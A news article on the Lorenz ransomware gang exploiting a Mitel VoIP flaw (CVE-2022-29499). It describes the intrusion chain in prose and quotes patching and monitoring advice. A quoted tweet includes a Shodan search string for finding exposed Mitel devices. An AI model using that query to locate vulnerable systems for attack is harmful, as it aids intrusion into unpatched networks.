The Lorenz ransomware gang is exploiting a vulnerability in Mitel VoIP appliances to break corporate networks.
Threat hunters with cybersecurity firm Arctic Wolf Labs recently found that Lorenz – a prolific group that has been around since at least early 2021 and lately is primarily targeting SMBs in the US, China, and Mexico – used a vulnerability (CVE-2022-29499) in a MiVoice VoIP appliance from Mitel to get into a victim’s network before deploying Microsoft’s BitLocker Drive Encryption tool to encrypt the data.
Shodan search to find Mitel boxes:http.html_hash:-1971546278Presentation online has roughly doubled in 5 years. pic.twitter.com/IYC4r0hjdk
— Kevin Beaumont (@GossiTheDog) June 24, 2022
Like many ransomware groups, Lorenz uses a double-extortion method, exfiltrating the victim’s data before encrypting the systems and threatening to publicly disclose the data if the ransom isn’t paid.
The Lorenz attackers initially got into the targeted company’s network by exploiting a remote code execution vulnerability in a Mitel appliance on the network’s perimeter. The RCE vulnerability affected Mitel’s Service Appliance component of MiVoice Connect, a feature that brings together collaboration and communications tools into a single interface.
“It is worth noting that, after exploitation of the Mitel device, Lorenz did not immediately proceed with any further activity for about a month,” the Arctic Wolf researchers wrote, which would have given time for CSOs to react.
The cybercriminals obtained a reverse shell and used Go-based open-source tunneling tool Chisel to tunnel into the corporate IT environment via the vulnerability. This allowed the attackers to get into the victim’s network.
After exploiting the Mitel device, the attackers used this to create a hidden directory and downloaded a compiled binary of Chisel from GitHub through via wget. From there they obtained credentials for privileged administrator accounts to move laterally through the network via Remote Desktop Protocol (RDP).
The cybercriminals then exfiltrated the data using FileZilla before encrypting them.
New dogs using old tricks
This isn’t the first time attackers have used the Mitel vulnerability to launch an attack. CrowdStrike analysts in a June report outlined the vulnerability and another ransomware attempt to use the flaw to gain initial access into a corporate network.
With the more recent attempt, Arctic Wolf researchers saw that the tactics used by the attackers overlapped with what CrowdStrike described regarding initial access.
In early July, Rapid7 threat hunters reported a small number of intrusions using the Mitel flaw for initial access.
While they didn’t believe a large number of the Mitel devices were exposed to the internet or that the flaw was being targeted in wide-scale ransomware campaigns, “we are conscious of the fact … that the proliferation of ransomware in general has continued to shape risk models for many organizations and that network perimeter devices are tempting targets for a variety of attackers,” they wrote.
Monitor the perimeter
“Threat actors are beginning to shift targeting to lesser known or monitored assets to avoid detection,” Arctic Wolf researchers wrote in a blog post this week.
“In the current landscape, many organizations heavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and IoT devices without proper monitoring, which enables threat actors to gain a foothold into an environment without being detected.”
Andrew Hay, COO at Lares Consulting, told The Register that as more mature organizations patch their obvious assets, threat group will continue to look for the easiest ways into victims’ environments.
“Attackers will target the lowest hanging fruit and VoIP systems are some of the most infrequently patched assets in any organization,” he said. “This is mainly because they are thought of as ‘phones’ and not the computers they are.”
Mitel identified the flaw in April and delivered a remediation script at the time before releasing MiVoice Connect version R19.3, which fixed the problem, three months later.
According to Cybereason, the Lorenz ransomware variant was first detected in February 2021 and could be a new brand given to the .sZ40 ransomware found in October 2020. It also has been linked to the ThunderCrypt ransomware first seen in 2017.
The increased targeting of VoIP appliances “will force organizations to treat all hackable devices the same from an InfoSec perspective,” IoT security shop Viakoo’s CEO Bud Broomhead told The Register.
“A device not being part of IT is no reason to treat it differently from a cyber perspective. Unless a device is given an official exemption, it should be held to the same patching, password, and security standard as servers or networking devices.”
James McQuiggan, security awareness advocate at KnowBe4, told The Register that “organizations need to ensure they have change control and patch management programs to monitor all assets for updates and implement all updates promptly to avoid potential data breaches through unpatched systems.” ®